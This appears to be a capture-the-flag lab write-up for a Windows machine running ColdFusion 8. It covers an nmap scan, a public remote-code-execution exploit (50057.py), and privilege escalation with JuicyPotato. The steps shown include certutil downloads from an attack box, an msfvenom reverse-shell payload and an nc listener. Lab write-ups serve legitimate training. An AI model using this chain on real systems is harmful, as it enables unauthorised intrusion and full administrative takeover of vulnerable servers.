sudo nmap -sC -sV -v -o nmap -T4 -Pn
Open ports 135, 8500, 49154
From that output 8500 stands out, visiting on a web browser
Interesting directories, exploring each
Looks like config files for something, googling directory names:
CFIDE + port 8500 indicates ColdFusion. Looks like a server management solution
Lets try to find a panel login or something.
Parent .. dir 01/20/24 04:31 μμ
Application.cfm 1151 03/18/08 11:06 πμ
adminapi/ dir 03/22/17 08:53 μμ
administrator/ dir 03/22/17 08:55 μμ
classes/ dir 03/22/17 08:52 μμ
componentutils/ dir 03/22/17 08:52 μμ
debug/ dir 03/22/17 08:52 μμ
images/ dir 03/22/17 08:52 μμ
install.cfm 12077 03/18/08 11:06 πμ
multiservermonitor-access-policy.xml 278 03/18/08 11:07 πμ
probe.cfm 30778 03/18/08 11:06 πμ
scripts/ dir 03/22/17 08:52 μμ
shell.jsp 1499 01/20/24 04:41 μμ
wizards/ dir 03/22/17 08:52 μμ
CFIDE/administrator/ is a login panel
We also see the version of coldfusion , ColdFusion 8.
Exploit Analysis
Low hanging CVE?
searchsploit ColdFusion 8
Adobe ColdFusion 8 - Remote Command Execution (RCE) | cfm/webapps/50057.py
Looks promising, lets try.
searchsploit -m 50057
Reading through the code, the main portions are
- Generating a jsp payload (with msfvenom in this case)
- Posting the payload to directory:
- Requesting the newly uploaded payload to execute.
Lets see if it’s as easy as running it.
python3 50057.py
Simple as that !
net users
User accounts for \\ARCTIC
Administrator Guest tolis
The command completed successfully.
Looks like we are already user level, lets grab that flag.
Alright, how can we priv esc?
Looks like we are in some privileged groups & have some user pivs enabled.
We have SeImpersonatePrivilege which is usually a good indicator of juicypotato working.
Privilege Escalation
Read more about potato attacks here:
- We need the CLSID for JP to work. Lets find out what version of windows we are on.
We are on Microsoft Windows Server 2008 R2 we can lookup the CLSIDs for this particular OS here:
Lets grab the binary and transfer it to the machine
On our attack box
Host on webserver
python3 -m http.server 80
On target machine
certutil -urlcache -f JP.exe
Now we need something for JuicyPotato to launch with higher privs, we can generate an msfvenom payload for this.
On attack box
msfvenom -p windows/x64/shell_reverse_tcp LPORT=42069 -f exe -o sh.exe LHOST=
Now transfer the same way
On target machine
certutil -urlcache -f sh.exe
Start by listening on your attack box 💬
nc -lvnp 42069
Now, lets launch JP.exe with the following args:
JP.exe -l 1337 -p C:\Users\tolis\Documents\sh.exe -t * -c {C49E32C6-BC8B-11d2-85D4-00105A1F8304}
We got a shell back!
Are we NT \ Authority ? 🤔